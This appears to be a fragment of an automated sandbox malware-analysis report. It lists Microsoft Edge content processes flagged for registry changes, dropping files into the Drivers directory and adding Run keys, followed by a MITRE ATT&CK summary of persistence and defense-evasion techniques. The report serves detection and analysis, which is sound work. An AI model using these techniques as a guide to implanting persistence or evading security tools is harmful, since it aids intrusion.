C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:10984
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:11204
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
PID:6756
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1File Deletion
2Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1